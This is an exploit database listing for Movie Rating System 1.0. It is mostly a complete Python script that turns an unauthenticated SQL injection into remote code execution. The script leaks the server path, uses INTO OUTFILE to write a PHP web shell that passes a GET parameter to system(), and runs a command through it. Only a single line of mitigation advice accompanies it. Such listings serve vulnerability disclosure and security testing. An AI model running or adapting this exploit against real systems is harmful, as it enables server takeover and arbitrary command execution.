Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

vendor:

Movie Rating System

by:

Tagoletta (Tagmaç)

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Movie Rating System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:movie_rating_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu

2021

Movie Rating System 1.0 – SQLi to RCE (Unauthenticated)

This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable system by exploiting a SQL injection vulnerability in the Movie Rating System 1.0. The attacker can craft a malicious SQL query to inject malicious code into the vulnerable system, which can then be executed by the web server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.

import requests
import random
import string
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')

getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
    if "movie" in i.text.lower():
        selectPage = i["href"]
        break

selectPage = selectPage.replace("./","")
findSql = url + selectPage
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})

sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")

sqlPage = url + sqlPage

print("\nFinding path")

findPath = requests.get(sqlPage + '\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>:  ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)

parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
    findPath += find + "/"

print("\nFound Path : " + findPath)

SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

print("\n\nShell Uploading...")
status = requests.get(sqlPage+SQLtoRCE)

shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
print("\nShell Path : " + url+shellname+".php")